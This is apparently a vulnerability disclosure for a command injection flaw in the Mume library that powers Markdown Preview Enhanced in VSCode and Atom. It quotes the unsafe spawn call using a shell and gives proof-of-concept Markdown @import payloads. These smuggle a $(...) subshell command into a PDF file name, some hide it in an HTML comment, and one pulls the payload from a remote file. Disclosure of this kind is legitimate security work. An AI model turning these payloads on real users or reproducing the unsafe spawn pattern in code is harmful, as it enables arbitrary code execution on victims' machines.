Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)
The Mume markdown tool library was vulnerable to command injection due to use of spawn command with {shell: true} option. This could allow an attacker to achieve arbitary code execution by tricking victim into opening specially crafted Markdown file using VSCode or Atom. The library powers Markdown Preview Enhanced plugin for both VSCode and Atom.
Vulnerable code snippet:
const task = spawn(
"pdf2svg",
[
`"${pdfFilePath}"`,
`"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
"all",
],
{ shell: true },
)The following Markdown document allows an attacker to execute arbitary command:
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"
The following comment will be recognised by MPE as valid "@import" command:
<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->Alternatively, the payload could be executed from external source:
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->DEMO for both VSCode and Atom on YouTube.
